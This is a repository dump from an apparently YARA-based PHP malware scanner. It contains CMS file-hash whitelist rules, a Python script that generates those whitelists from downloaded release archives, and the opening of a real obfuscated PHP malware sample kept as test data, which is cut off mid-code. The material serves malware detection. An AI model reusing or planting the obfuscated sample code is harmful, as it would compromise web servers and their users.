sha1sum may be recomputed for every test. 4 | Please make sure that you're calling those rules after all the others. 5 | */ 6 | 7 | include "whitelists/drupal.yar" 8 | include "whitelists/wordpress.yar" 9 | include "whitelists/symfony.yar" 10 | include "whitelists/phpmyadmin.yar" 11 | include "whitelists/magento1ce.yar" 12 | include "whitelists/magento2.yar" 13 | include "whitelists/prestashop.yar" 14 | include "whitelists/custom.yar" 15 | 16 | 17 | private rule Magento : ECommerce 18 | { 19 | condition: 20 | /* Magento 1.14.2.0 */ 21 | hash.sha1(0, filesize) == "039ad85dc5940947849f7fe1a179563c829403ab" or // lib/PEAR/XML/Parser/Simple.php 22 | hash.sha1(0, filesize) == "5f577c2a35ababbf39e0efb53294e5adf523822b" or // lib/PEAR/XML/Serializer.php 23 | hash.sha1(0, filesize) == "27f0e4b1a09e816e40f9e6396c2d4a3cabdb2797" or // lib/PEAR/XML/Parser.php 24 | hash.sha1(0, filesize) == "258522ff97a68138daf0566786b22e722c0ff520" or // lib/PEAR/XML/Unserializer.php 25 | hash.sha1(0, filesize) == "a90d7f679a41443d58d5a96bcb369c3196a19538" or // iib/PEAR/SOAP/Base.php 26 | hash.sha1(0, filesize) == "7faa31f0ee66f32a92b5fd516eb65ff4a3603156" or // lib/PEAR/SOAP/WSDL.php 27 | hash.sha1(0, filesize) == "6b3f32e50343b70138ce4adb73045782b3edd851" or // lib/phpseclib/Net/SSH1.php 28 | hash.sha1(0, filesize) == "ea4c5c75dc3e4ed53c6b9dba09ad9d23f10df9d5" or // lib/phpseclib/Crypt/Rijndael.php 29 | hash.sha1(0, filesize) == "eb9dd8ec849ef09b63a75b367441a14ca5d5f7ae" or // lib/phpseclib/Crypt/Hash.php 30 | hash.sha1(0, filesize) == "a52d111efd3b372104ebc139551d2d8516bbf5e0" or // lib/phpseclib/Crypt/RSA.php 31 | 32 | /* Magento 1.13.0.0 */ 33 | hash.sha1(0, filesize) == "988006fe987a3c192d74b355a5011326f7728d60" or // lib/PEAR/PEAR/PEAR.php 34 | hash.sha1(0, filesize) == "0747f27fd0469608d1686abeaf667d9ad2b4c214" or // lib/PEAR/Mail/mime.php 35 | hash.sha1(0, filesize) == "6c0b33527f8e4b0cab82fc9ba013549f945fad75" or // lib/PEAR/SOAP/Transport/HTTP.php 36 | hash.sha1(0, filesize) == "9a340997bddbee19c1ec9ed62aa3b7e7a39d620a" or // lib/PEAR/PEAR.php 37 | hash.sha1(0, filesize) == "a11e09ee903fe2a1f8188b27186d2dd5098419af" or // app/code/core/Mage/Adminhtml/Model/Url.php 38 | hash.sha1(0, filesize) == "c60a936b7a532a171b79e17bfc3497de1e3e25be" or // app/code/core/Mage/Dataflow/Model/Profile.php 39 | hash.sha1(0, filesize) == "9947a190e9d82a2e7a887b375f4b67a41349cc7f" or // app/code/core/Mage/Core/Model/Translate.php 40 | hash.sha1(0, filesize) == "5fe6024f5c565a7c789de28470b64ce95763e3f4" or // cron.php 41 | 42 | /* Magento 1.9.2.0 */ 43 | hash.sha1(0, filesize) == "4fa9deecb5a49b0d5b1f88a8730ce20a262386f7" or // lib/Zend/Session.php 44 | hash.sha1(0, filesize) == "f214646051f5376475d06ef50fe1e5634285ba1b" or // app/code/core/Mage/Adminhtml/Model/Url.php 45 | 46 | /* Magento 1.7.0.2 */ 47 | hash.sha1(0, filesize) == "f46cf6fd47e60e77089d94cca5b89d19458987ca" or // lib/Zend/Session.php 48 | hash.sha1(0, filesize) == "ffb3e46c87e173b1960e50f771954ebb1efda66e" or // lib/Zend/Ldap/Converter.php 49 | hash.sha1(0, filesize) == "7faa31f0ee66f32a92b5fd516eb65ff4a3603156" or // lib/PEAR/SOAP/WSDL.php 50 | hash.sha1(0, filesize) == "539de72a2a424d86483f461a9e38ee42df158f26" or // app/code/core/Mage/Adminhtml/Model/Url.php 51 | hash.sha1(0, filesize) == "6b3f32e50343b70138ce4adb73045782b3edd851" or // lib/phpseclib/Net/SSH1.php 52 | 53 | /* Magento 1.4.1.1 */ 54 | hash.sha1(0, filesize) == "0b74f4b259c63c01c74fb5913c3ada87296107c8" or // lib/Zend/Session.php 55 | hash.sha1(0, filesize) == "951a4639e49c6b2ad8adeb38481e2290297c8e70" or // lib/Zend/Ldap/Converter.php 56 | hash.sha1(0, filesize) == "44ba7a5b685f4a52113559f366aaf6e9a22ae21e" // app/code/core/Mage/Adminhtml/Model/Url.php 57 | } 58 | 59 | private rule Roundcube 60 | { 61 | condition: 62 | /* Roundcube 1.1.2 */ 63 | hash.sha1(0, filesize) == "afab52649172b46f64301f41371d346297046af2" or // program/lib/Roundcube/rcube_utils.php 64 | hash.sha1(0, filesize) == "e6b81834e081cc2bd38fce787c5088e63d933953" or // program/include/rcmail_output_html.php 65 | hash.sha1(0, filesize) == "7783e9fad144ca5292630d459bd86ec5ea5894fc" or // vendor/pear-pear.php.net/Net_LDAP2/Net/LDAP2/Util.php 66 | 67 | /* Roundcube 1.0.6 */ 68 | hash.sha1(0, filesize) == "76d55f05f2070f471ba977b5b0f690c91fa8cdab" or // program/lib/Roundcube/rcube_utils.php 69 | hash.sha1(0, filesize) == "c68319e3e1adcd3e22cf2338bc79f12fd54f6d4a" // program/include/rcmail_output_html.php 70 | } 71 | 72 | private rule Concrete5 73 | { 74 | condition: 75 | /* concrete5 7.4.2 */ 76 | hash.sha1(0, filesize) == "927bbd60554ae0789d4688738b4ae945195a3c1c" or // concrete/vendor/oyejorge/less.php/lib/Less/Tree/Dimension.php 77 | hash.sha1(0, filesize) == "67f07022dae5fa39e8a37c09d67cbcb833e10d1f" or // concrete/vendor/oyejorge/less.php/lib/Less/Tree/Unit.php 78 | hash.sha1(0, filesize) == "e1dcbc7b05e8ba6cba392f8fd44a3564fcad3666" // concrete/vendor/doctrine/inflector/lib/Doctrine/Common/Inflector/Inflector.php 79 | } 80 | 81 | private rule Dotclear : Blog 82 | { 83 | condition: 84 | /* dotclear 2.8.0 */ 85 | hash.sha1(0, filesize) == "c732d2d54a80250fb8b51d4dddb74d05a59cee2e" or // inc/public/class.dc.template.php 86 | hash.sha1(0, filesize) == "cc494f7f4044b5a3361281e27f2f7bb8952b8964" or // inc/core/class.dc.modules.php 87 | 88 | /* dotclear 2.7.5 */ 89 | hash.sha1(0, filesize) == "192126b08c40c5ca086b5e4d7433e982f708baf3" or // inc/public/class.dc.template.php 90 | hash.sha1(0, filesize) == "51e6810ccd3773e2bd453e97ccf16059551bae08" or // inc/libs/clearbricks/common/lib.date.php 91 | hash.sha1(0, filesize) == "4172e35e7c9ce35de9f56fb8dfebe8d453f0dee4" or // inc/libs/clearbricks/template/class.template.php 92 | hash.sha1(0, filesize) == "cf65db6ae55486f51370f87c4653aaed56903ccc" // inc/core/class.dc.modules.php 93 | } 94 | 95 | private rule Owncloud 96 | { 97 | condition: 98 | /* ownCloud 8.1.0 */ 99 | hash.sha1(0, filesize) == "a58489a3d8401295bb09cfbad09486f605625658" or // 3rdparty/phpseclib/phpseclib/phpseclib/Net/SSH1.php 100 | hash.sha1(0, filesize) == "463627a4064dc05e93e6f9fc5605d4c8a4e09200" or // 3rdparty/jeremeamia/SuperClosure/src/SerializableClosure.php 101 | hash.sha1(0, filesize) == "5346cb6817a75c26a6aad86e0b4ffb1d5145caa5" or // 3rdparty/symfony/process/Symfony/Component/Process/Process.php 102 | hash.sha1(0, filesize) == "c8a6d4292448c7996e0092e6bfd38f90c34df090" or // core/doc/admin/_images/oc_admin_app_page.png 103 | hash.sha1(0, filesize) == "acc7af31d4067c336937719b9a9ad7ac8497561e" // core/doc/admin/_sources/configuration_server/performance_tuning.txt 104 | } 105 | 106 | private rule Misc 107 | { 108 | condition: 109 | /* HTMLPurifier standalone 4.6.0 */ 110 | hash.sha1(0, filesize) == "9452a5f1183cbef0487b922cc1ba904ea21ad39a" 111 | } 112 | 113 | private rule IsWhitelisted 114 | { 115 | condition: 116 | Symfony or 117 | Wordpress or 118 | Prestashop or 119 | Magento or 120 | Magento1Ce or 121 | Magento2 or 122 | Drupal or 123 | Roundcube or 124 | Concrete5 or 125 | Dotclear or 126 | Owncloud or 127 | Phpmyadmin or 128 | Misc 129 | } 130 | -------------------------------------------------------------------------------- /data/whitelists/phpmyadmin.yar: -------------------------------------------------------------------------------- 1 | import "hash" 2 | 3 | private rule Phpmyadmin 4 | { 5 | meta: 6 | generated = "2018-05-30T12:35:38.661805" 7 | 8 | condition: 9 | /* Phpmyadmin 4.0.0 */ 10 | hash.sha1(0, filesize) == "1055b5023001d995d1a42e9e25731b621b3a1b78" or // libraries/plugins/auth/swekey/swekey.auth.lib.php 11 | hash.sha1(0, filesize) == "df4108af17881e331feeeeef9ec35ef4b2fff87c" or // libraries/select_lang.lib.php 12 | hash.sha1(0, filesize) == "534f0c81f69b78a3c0cd64748f55d86effa94d96" or // server_databases.php 13 | hash.sha1(0, filesize) == "1f1d01182cf376eb7cc463cb67334c98166f3033" or // libraries/build_html_for_db.lib.php 14 | hash.sha1(0, filesize) == "ca17eb55ded8f62e7339e20d699f1e43a52df778" or // pmd_relation_upd.php 15 | hash.sha1(0, filesize) == "82cff5aa0109bab26bd5e53f9928fa8cb1d21d18" or // locale/da/LC_MESSAGES/phpmyadmin.mo 16 | hash.sha1(0, filesize) == "0401e8fdf617610e6da72c8a75c7ff0bf0e2a1e7" or // pmd_relation_new.php 17 | hash.sha1(0, filesize) == "be3ea7a4f914387dc71531c2479867ee65dfe947" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 18 | hash.sha1(0, filesize) == "8b2f9bb37f25ed57bb7497d4dc9c98a042dd367e" or // gis_data_editor.php 19 | hash.sha1(0, filesize) == "0e76cbda3599c8139f6a8a5c6c17f6abc3835397" or // doc/doctrees/faq.doctree 20 | hash.sha1(0, filesize) == "a4e970da05605cfe12b0897c111e475bb1ceeea3" or // doc/doctrees/config.doctree 21 | hash.sha1(0, filesize) == "2905b3fe33a09435b76675a8728e461f3ac5f9e0" or // doc/html/_sources/faq.txt 22 | hash.sha1(0, filesize) == "68c477fe016abd4236ee25717c7c736d400f1b58" or // libraries/DisplayResults.class.php 23 | hash.sha1(0, filesize) == "2905b3fe33a09435b76675a8728e461f3ac5f9e0" or // doc/faq.rst 24 | 25 | /* Phpmyadmin 4.0.1 */ 26 | hash.sha1(0, filesize) == "8a47d5c1f34e15094d4a6264cda406b943e021c4" or // locale/sl/LC_MESSAGES/phpmyadmin.mo 27 | hash.sha1(0, filesize) == "75f8ad7de654ad3bbc274528996a954bcc1785bc" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 28 | hash.sha1(0, filesize) == "833ccf4a4016a1b9594db0469f22e08688ef345a" or // doc/doctrees/faq.doctree 29 | hash.sha1(0, filesize) == "40d47a7e9786f77e63ffeb444cd529e88e22498f" or // doc/doctrees/config.doctree 30 | hash.sha1(0, filesize) == "4e93c2797c64b3754694b69d3135e7a09f805a86" or // libraries/DisplayResults.class.php 31 | 32 | /* Phpmyadmin 4.0.2 */ 33 | hash.sha1(0, filesize) == "9354e4058a1efa8aa73918eb2bd45f5cd8777485" or // locale/ko/LC_MESSAGES/phpmyadmin.mo 34 | hash.sha1(0, filesize) == "7aa5c4d0e51d219ebba86ddc644dca0355e5f6cd" or // doc/doctrees/faq.doctree 35 | hash.sha1(0, filesize) == "73efef4f340f00aa2823cf575c30d5fd63d571cc" or // doc/doctrees/config.doctree 36 | hash.sha1(0, filesize) == "ee8b1d455efa66a92ce3025d7c79758cb2767e76" or // libraries/DisplayResults.class.php 37 | 38 | /* Phpmyadmin 4.0.3 */ 39 | hash.sha1(0, filesize) == "72e309407d3a741f9345cc252d8853013909c1cb" or // doc/doctrees/faq.doctree 40 | hash.sha1(0, filesize) == "70ab1c6ebdcc383fa12e68b24dff205cc313761a" or // doc/doctrees/config.doctree 41 | 42 | /* Phpmyadmin 4.0.4 */ 43 | hash.sha1(0, filesize) == "ba8247bedab84b62d23998eb96be6f2a92d4d1bc" or // libraries/select_lang.lib.php 44 | hash.sha1(0, filesize) == "6feca5c241e41d8fdcfb0f9104f06fc27414206e" or // doc/doctrees/faq.doctree 45 | hash.sha1(0, filesize) == "5d01bc6404187356a5428ea392dda0304f5a06be" or // doc/doctrees/config.doctree 46 | hash.sha1(0, filesize) == "dfa5d49a57c3849589d7db123850fe22efe0e421" or // doc/html/_sources/faq.txt 47 | hash.sha1(0, filesize) == "dfa5d49a57c3849589d7db123850fe22efe0e421" or // doc/faq.rst 48 | 49 | /* Phpmyadmin 4.0.5 */ 50 | hash.sha1(0, filesize) == "8690e479b31ee1705de8fd654eed504ea86255d6" or // libraries/plugins/auth/swekey/swekey.auth.lib.php 51 | hash.sha1(0, filesize) == "0fa37a1808b87318af1c8b909515926ea908e20d" or // server_databases.php 52 | hash.sha1(0, filesize) == "08b9be901a1cad1910f909b0c3308c80179faea8" or // locale/pl/LC_MESSAGES/phpmyadmin.mo 53 | hash.sha1(0, filesize) == "1a39333456f3ed00f78c434cd2260aa1f6055d28" or // locale/zh_CN/LC_MESSAGES/phpmyadmin.mo 54 | hash.sha1(0, filesize) == "086cf75edbc7a84d7e2da7acd4ef449414b04a30" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 55 | hash.sha1(0, filesize) == "5d941f85a5364e609fc1e772df46b11cd53a31ce" or // locale/it/LC_MESSAGES/phpmyadmin.mo 56 | hash.sha1(0, filesize) == "38a06d88278ce2d049c27861f1065f946aee5fdb" or // locale/zh_TW/LC_MESSAGES/phpmyadmin.mo 57 | hash.sha1(0, filesize) == "d8209cbed693cbfab4e49a20d2b72a545eff09d7" or // doc/doctrees/config.doctree 58 | hash.sha1(0, filesize) == "fb04115aa12c7ba54adcc64b20255b3e93916e94" or // libraries/DisplayResults.class.php 59 | hash.sha1(0, filesize) == "e80ac17842b54c099836c04e4eebf72f09c36559" or // doc/doctrees/faq.doctree 60 | 61 | /* Phpmyadmin 4.0.6 */ 62 | hash.sha1(0, filesize) == "178edee119fd53a1ca87f289213faf34c6e23065" or // locale/it/LC_MESSAGES/phpmyadmin.mo 63 | hash.sha1(0, filesize) == "89137874313404331edd64dd561ee72c1e90a966" or // locale/pl/LC_MESSAGES/phpmyadmin.mo 64 | hash.sha1(0, filesize) == "21ace5bcde26b98a381091fc3dda588115bff565" or // locale/sv/LC_MESSAGES/phpmyadmin.mo 65 | hash.sha1(0, filesize) == "819cfe3120478406300d5fc446d258df9790db10" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 66 | hash.sha1(0, filesize) == "5c0ba64f2f6f4de362cb2a227325194283edd64b" or // doc/doctrees/faq.doctree 67 | hash.sha1(0, filesize) == "5993a60e0f14ef9d898b3f82e7bb5faf410084c9" or // doc/doctrees/config.doctree 68 | hash.sha1(0, filesize) == "5bf1ebc6cd395fc8cc084f2b2ce45ad31a2e847f" or // libraries/DisplayResults.class.php 69 | 70 | /* Phpmyadmin 4.0.7 */ 71 | hash.sha1(0, filesize) == "23590f9a72fd45409b79f238e6a32d394268d484" or // server_databases.php 72 | hash.sha1(0, filesize) == "f9b7639cb78d11bd6f55a89a4630409b1f0b4ed6" or // locale/zh_CN/LC_MESSAGES/phpmyadmin.mo 73 | hash.sha1(0, filesize) == "6790cd3b963f31c4706689564bb3a758868e25e2" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 74 | hash.sha1(0, filesize) == "0c7b68640f071c0a7cf2d5c27b1ab1a557778c35" or // doc/doctrees/faq.doctree 75 | hash.sha1(0, filesize) == "c9d24ecbe33a5a9bed089be06008d5ace9fe8022" or // doc/doctrees/config.doctree 76 | hash.sha1(0, filesize) == "28d2a89687bf1ab53d52180043635f0290d3e848" or // locale/en_GB/LC_MESSAGES/phpmyadmin.mo 77 | hash.sha1(0, filesize) == "2747f18959d06cadac8cd8d8a16b95ff8ef0fd25" or // locale/nb/LC_MESSAGES/phpmyadmin.mo 78 | hash.sha1(0, filesize) == "8eb466ea26d87c9a5b55c8349b106f5b621d8347" or // libraries/DisplayResults.class.php 79 | 80 | /* Phpmyadmin 4.0.8 */ 81 | hash.sha1(0, filesize) == "47b80bc9f6a053cbd794e349bf7c81e1ac523780" or // doc/doctrees/config.doctree 82 | hash.sha1(0, filesize) == "75f3774629d8bb599b4111a36a5b813e800b61bf" or // doc/doctrees/faq.doctree 83 | 84 | /* Phpmyadmin 4.0.9 */ 85 | hash.sha1(0, filesize) == "1db96b0f2bab1a326255a271c190859ca0d2fd15" or // locale/ja/LC_MESSAGES/phpmyadmin.mo 86 | hash.sha1(0, filesize) == "5dc82742fbbe5b2322321995474a0a1a784736a1" or // doc/doctrees/faq.doctree 87 | hash.sha1(0, filesize) == "f8ed7a657101c83ca24761111dfcf8298818ea84" or // doc/doctrees/config.doctree 88 | 89 | /* Phpmyadmin 4.0.10 */ 90 | hash.sha1(0, filesize) == "3cb1858da44833ca8bca16c2651881d5d899a1dc" or // doc/doctrees/faq.doctree 91 | hash.sha1(0, filesize) == "cabf489740e6cf929cc6641dc68caac9b7a402a1" // doc/doctrees/config.doctree 92 | 93 | } 94 | -------------------------------------------------------------------------------- /utils/mass_whitelist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from __future__ import print_function 5 | 6 | import sys 7 | import tarfile 8 | from copy import copy 9 | from datetime import datetime 10 | from collections import OrderedDict 11 | from hashlib import sha1 12 | from urllib2 import urlopen, HTTPError 13 | from StringIO import StringIO 14 | 15 | import yara 16 | 17 | USAGE = """ 18 | USAGE: %(prog)s [ [ []]] 19 | 20 | Options: 21 | NAME : name of the CMS/whatever being whitelisted 22 | URL_PATTERN : download URL with __version__ as a version placeholder 23 | MAJOR : minimum and maximum major version to crawl (eg: 1-8, 8) 24 | MINOR : minimum and maximum minor version to crawl 25 | PATCH : minimum and maximum patch version to crawl 26 | 27 | Examples: 28 | %(prog)s drupal https://ftp.drupal.org/files/projects/drupal-__version__.tar.gz 9 50 29 | %(prog)s drupal https://ftp.drupal.org/files/projects/drupal-__version__.tar.gz 4-9 1-50 30 | 31 | %(prog)s wordpress https://wordpress.org/wordpress-__version__.tar.gz 4 15 32 | 33 | %(prog)s symphony https://github.com/symfony/symfony/archive/v__version__.tar.gz 3 9 34 | 35 | %(prog)s phpmyadmin https://files.phpmyadmin.net/phpMyAdmin/__version__/phpMyAdmin-__version__-all-languages.tar.gz 4 9 36 | """ % {'prog': sys.argv[0]} 37 | 38 | 39 | class Opts: 40 | DEFAULT_MIN = 0 41 | DEFAULT_MAX = 99 42 | YARA_RULES = yara.compile(sys.path[0]+'/../php.yar', includes=True, error_on_warning=True) 43 | 44 | @classmethod 45 | def to_str(cls): 46 | values = [] 47 | for attr in cls.__dict__: 48 | if attr.isupper(): 49 | values.append('%s=%s' % (attr, getattr(cls, attr))) 50 | return '' % ' '.join(values) 51 | 52 | 53 | def eprint(*args, **kwargs): 54 | print(*args, file=sys.stderr, **kwargs) 55 | 56 | 57 | def extract_version_arg(index): 58 | min_ver, max_ver = (Opts.DEFAULT_MIN, Opts.DEFAULT_MAX) 59 | if len(sys.argv) >= (index + 1): 60 | if '-' in sys.argv[index]: 61 | min_ver, max_ver = map(int, sys.argv[index].split('-')) 62 | else: 63 | max_ver = int(sys.argv[index]) 64 | return min_ver, max_ver 65 | 66 | 67 | def generate_whitelist(version): 68 | rules = {} 69 | 70 | # download archive 71 | dl_failed = False 72 | download_url = Opts.URL_PATTERN.replace('__version__', version) 73 | download_url_str = Opts.URL_PATTERN.replace('__version__', '\x1b[1;33m%s\x1b[0m' % version) 74 | eprint("[+] Downloading %s... " % download_url_str, end='') 75 | sys.stdout.flush() 76 | try: 77 | resp = urlopen(download_url) 78 | resp_code = resp.code 79 | except HTTPError as err: 80 | dl_failed = True 81 | resp_code = err.code 82 | if dl_failed or (resp_code != 200): 83 | eprint("\x1b[1;31mFAILED (%d)\x1b[0m" % resp_code) 84 | return None 85 | data = StringIO(resp.read()) 86 | data.seek(0) 87 | eprint("\x1b[1;32mOK\x1b[0m") 88 | 89 | # extract archive and check against YARA signatures (in-memory) 90 | eprint("[-] Generating whitelist... ", end='') 91 | sys.stdout.flush() 92 | tar = tarfile.open(mode='r:gz', fileobj=data) 93 | for entry in tar.getnames(): 94 | entry_fd = tar.extractfile(entry) 95 | if entry_fd is None: 96 | continue 97 | entry_data = entry_fd.read() 98 | matches = Opts.YARA_RULES.match(data=entry_data, fast=True) 99 | if matches: 100 | rules['/'.join(entry.split('/')[1:])] = sha1(entry_data).hexdigest() 101 | eprint("\x1b[1;32mDONE\x1b[0m") 102 | 103 | return rules 104 | 105 | 106 | # init vars 107 | whitelists = OrderedDict() 108 | 109 | # check args 110 | if (len(sys.argv) < 3) or (len(sys.argv) > 6): 111 | eprint(USAGE) 112 | sys.exit(1) 113 | 114 | # parse args 115 | Opts.CMS_NAME = sys.argv[1] 116 | Opts.URL_PATTERN = sys.argv[2] 117 | Opts.MIN_MAJOR, Opts.MAX_MAJOR = extract_version_arg(3) 118 | Opts.MIN_MINOR, Opts.MAX_MINOR = extract_version_arg(4) 119 | Opts.MIN_PATCH, Opts.MAX_PATCH = extract_version_arg(5) 120 | 121 | # loop over possible versions 122 | for vmajor in range(Opts.MIN_MAJOR, Opts.MAX_MAJOR + 1): 123 | # download without vminor and vpatch (but ignore if it doesn't exist) 124 | version = "%d" % vmajor 125 | rules = generate_whitelist(version) 126 | if (rules is not None) and rules: 127 | whitelists[version] = rules 128 | 129 | has_mversion = False 130 | first_mloop = True 131 | for vminor in range(Opts.MIN_MINOR, Opts.MAX_MINOR + 1): 132 | # download without vpatch (but ignore if it doesn't exist) 133 | version = "%d.%d" % (vmajor, vminor) 134 | rules = generate_whitelist(version) 135 | if rules is not None: 136 | has_mversion = True 137 | if rules: 138 | whitelists[version] = rules 139 | #if (rules is None) and (has_mversion or not first_mloop): 140 | # break 141 | first_mloop = False 142 | 143 | has_pversion = False 144 | first_ploop = True 145 | for vpatch in range(Opts.MIN_PATCH, Opts.MAX_PATCH + 1): 146 | version = "%d.%d.%d" % (vmajor, vminor, vpatch) 147 | rules = generate_whitelist(version) 148 | if rules is not None: 149 | has_pversion = True 150 | if rules: 151 | whitelists[version] = rules 152 | # break loop if download failed and: 153 | # - a version has already been found during this loop 154 | # - this is the 2nd iteration (if a version wasn't found, 155 | # it means download failed twice) 156 | if (rules is None) and (has_pversion or not first_ploop): 157 | break 158 | first_ploop = False 159 | 160 | # remove duplicate entries: 161 | eprint("[+] Deduplicating detections... ", end='') 162 | known_files = [] 163 | for version, rules in copy(whitelists.items()): 164 | used_rules = 0 165 | for filename, digest in rules.items(): 166 | rtuple = (filename, digest) 167 | if rtuple in known_files: 168 | del whitelists[version][filename] 169 | else: 170 | known_files.append(rtuple) 171 | used_rules += 1 172 | if used_rules == 0: 173 | del whitelists[version] 174 | eprint("\x1b[1;32mDONE\x1b[0m") 175 | 176 | eprint("[+] Generating final whitelist... ", end='') 177 | # build final rule 178 | prefix = 8 * ' ' 179 | conditions = [] 180 | len_wl = len(whitelists.keys()) - 1 181 | for index, (version, rules) in enumerate(whitelists.items()): 182 | cond_str = '%s/* %s %s */\n' % (prefix, Opts.CMS_NAME.title(), version) 183 | len_rules = len(rules.keys()) - 1 184 | for inner_index, (filename, digest) in enumerate(rules.items()): 185 | if (index == len_wl) and (inner_index == len_rules): # last loop iteration 186 | cond_str += '%shash.sha1(0, filesize) == "%s" // %s\n' % (prefix, digest, filename) 187 | else: 188 | cond_str += '%shash.sha1(0, filesize) == "%s" or // %s\n' % (prefix, digest, filename) 189 | conditions.append(cond_str) 190 | eprint("\x1b[1;32mDONE\x1b[0m") 191 | 192 | final_rule = """ 193 | import "hash" 194 | 195 | private rule %(name)s 196 | { 197 | meta: 198 | generated = "%(gendate)s" 199 | 200 | condition: 201 | %(conditions)s 202 | } 203 | """ % { 204 | 'name': Opts.CMS_NAME.title(), 205 | 'gendate': datetime.now().isoformat(), 206 | 'conditions': '\n'.join(conditions) 207 | } 208 | print(final_rule) 209 | -------------------------------------------------------------------------------- /data/samples/real/awvjtnz.php: -------------------------------------------------------------------------------- 1 | # This is a sample of PHP malware discovered 2017/11/15. 2 | # Unpacks at least 5 levels deep, including references to variables from previous levels of expansion. 3 | # Also seen with other variable names and constants altered. 4 | :h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1%s: x5c%j:.2^,%b:%s: x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))/*)323zbe!-#jt0*?]+^?]_ x5c}X x24hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#! x240w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*272qj%6<^#zsfvr# x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3 162 x65 141 x74 145 x5f 146 x772 145 x66 157 x78"))) { $oqtpxpv = " x6|:*r%:-t%)3of:opjudovg<~ x24! x242178}527}88:}334}472 xw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2*msv%)}k~~~%fdy!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH# x27rfs%6~6< x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)% x24- x24*#L4]275L3]x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x2id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6.%!<***f x27,*e x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6U<#16,47R57,27Rpd%6!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277##]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x24- x24 x5c%j^ x24- x24tvctus)% x24- x24buas," x72 166 x3a 61 x31")) or (strstr($uas!gj}1~!<2p% x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER[" x48 124 x5ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~7;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x24- x24gvodujpo! x24- xSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists(" x6f 142 x5f 16<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&/%rx<~!!%s:N}#-%o:W%c:>1<%b:>11<%j:=tj{fpg)%%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]276197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]epdof./#@#/qp%>5h%!<*::::::-1246767~6/7rfs%6<#o]1/20QUU0~:/h%:<**#57]38y]47]67y]37]88y]27]28yW;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}%tmw!>!#]y84]275]y83]27~!%z!>21<%j=6[%ww)))) { $GLOBALS[" x61 156 x75 156 x65 156 x63 164 x69 157 x6e"; function dhyvbmt($n){return chr(orx27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%tmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m," x61 156 x64 162 x6f 151 x64")) or 